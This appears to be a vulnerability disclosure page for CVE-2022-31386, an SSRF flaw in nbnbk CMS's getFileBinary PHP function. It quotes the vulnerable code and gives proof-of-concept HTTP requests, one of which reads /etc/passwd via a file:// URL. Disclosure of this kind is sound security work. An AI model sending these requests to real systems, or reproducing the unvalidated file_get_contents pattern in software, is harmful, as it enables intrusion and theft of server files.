Headline

CVE-2022-31386: [Vuln] SSRF vulnerability in getFileBinary Function · Issue #5 · Fanli2012/nbnbk

A Server-Side Request Forgery (SSRF) in the getFileBinary function of nbnbk cms 3 allows attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the URL parameter.

2 years ago

CVE

Open in Source

#vulnerability #js #php #ssrf

A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.

Vulnerable code in /application/api/controller/Index.php

/\*\*
 \* 文件转Base64二进制流
 \* @param $url 网络文件路径，绝对地址
 \* @return string
 \*/
public function getFileBinary()
{
    $str = file\_get\_contents($\_REQUEST\['url'\]);
    Util::echo\_json(ReturnData::create(ReturnData::SUCCESS,chunk\_split(base64\_encode($str))));
}

Vulnerability PoC

GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close

The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.

A remote attacker can also read arbitrary file information from the target system.

PoC

GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close

After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (/etc/passwd)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

9 months ago

9 months ago

9 months ago

9 months ago

9 months ago